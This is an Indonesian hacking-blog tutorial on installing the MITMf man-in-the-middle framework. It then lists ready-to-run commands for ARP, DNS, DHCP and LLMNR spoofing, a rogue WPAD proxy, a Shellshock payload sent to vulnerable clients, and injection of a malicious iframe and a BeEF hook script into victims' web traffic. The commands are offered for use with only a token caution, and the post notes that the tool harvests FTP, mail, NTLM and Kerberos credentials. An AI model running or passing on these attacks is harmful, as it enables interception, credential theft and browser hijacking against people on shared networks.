Installasi dan Basic Exploitasi Tools Mitmf di Linux

November 12, 2016
MITMf merupakan sebuah tools penetration testing yang fungsinya untuk serangan Man-In-The-Middle attack.



Fitur-Fitur

Kerangka kerja ini berisi built-in SMB, HTTP dan DNS server yang dapat dikendalikan dan digunakan oleh berbagai plugin, itu juga berisi versi modifikasi dari proxy SSLStrip yang memungkinkan untuk HTTP modifikasi dan HSTS memotong parsial.

Pada versi 0.9.8, MITMf mendukung penyaringan paket aktif dan manipulasi (pada dasarnya apa yang etterfilters lakukan, hanya lebih baik), yang memungkinkan pengguna untuk mengubah jenis lalu lintas atau protokol.

File konfigurasi dapat diedit on-the-fly sementara MITMf berjalan, perubahan akan diturunkan melalui kerangka: ini memungkinkan Kamu untuk men-tweak pengaturan plugin dan server saat melakukan serangan.

MITMf akan menangkap FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (string masyarakat), NTLMv1/v2 (semua protokol didukung seperti HTTP, SMB, LDAP dll) dan kredensial Kerberos dengan menggunakan Net-creds, yang berjalan pada memulai. sumber: Mitmf

Installasi

Jika kalian berada pada debian, ubuntu dan kali linux jalan script berikut

 root# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file 

Kemudian juga jalankan script berikut di terminal  

 root# git clone https://github.com/byt3bl33d3r/MITMf 

Kemudian masuk ke directory tempat filenya berada dengan cara jalankan perintah di bawah

 root# cd MITMf && git submodule init && git submodule update --recursive 

Sebelum memulai installasi hendaknya kita harus berada pada mode super user kemudian install

 root# pip install -r requirements.txt 

Succses!! tools Mitmf sudah terinstall



Documentasi Exploitasi

Penggunaan yang paling dasar, dimulai exploitasi dengan proxy HTTP SMB, DNS, server HTTP dan Net-creds pada antarmuka enp3s0

 root# python mitmf.py -i enp3s0 

ARP meracuni seluruh subnet dengan gateway di 192.168.1.1 menggunakan plugin Spoof

 root# python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

Sama seperti di atas + server proxy WPAD nakal menggunakan plugin Responder

 root# python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad 

Racuni Arp 192.168.1.16-45 dan 192.168.0.1/24 dengan gateway di 192.168.1.1

 root# python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1 

Aktifkan DNS spoofing dan racuni ARP (Domain untuk menipu ditarik dari file config)

 root# python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1 

Aktifkan LLMNR / NBTNS / mDNS spoofing

 root# python mitmf.py -i enp3s0 --responder --wredir --nbtns 

Aktifkan DHCP spoofing (ip kolam renang dan subnet ditarik dari file config)

 root# python mitmf.py -i enp3s0 --spoof --dhcp 

Sama seperti di atas dengan muatan SHELLSHOCK yang akan dijalankan jika ada klien yang rentan

 root# python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d' 

Menyuntikkan iFrame HTML menggunakan plugin Inject

 root# python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com 

Menyuntikkan skrip JS

 root# python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js 

Itulah contoh installasi dan dasar exploitasi tools mitmf di linux sytem, Ingat!! gunakan dengan bijak.

Share this :

Author merupakan seorang yang tertarik dengan cyber security namun bukan security expert

Previous
Next Post »
4 Komentar

Penulisan markup di komentar
  • Silahkan tinggalkan komentar jangan memasang link aktif, iklan dan spam saya yakin kamu bukan pecundang.
  • Untuk menyisipkan kode gunakan <i rel="code"> kode yang akan disisipkan </i>
  • Untuk menyisipkan kode panjang gunakan <i rel="pre"> kode yang akan disisipkan </i>
  • Untuk menyisipkan quote gunakan <i rel="quote"> catatan anda </i>
  • Untuk menyisipkan gambar gunakan <i rel="image"> URL gambar </i>
  • Untuk menyisipkan video gunakan [iframe] URL embed video [/iframe]
  • Kemudian parse kode tersebut pada kotak di bawah ini
  • © 2016 Dunia Peretas✔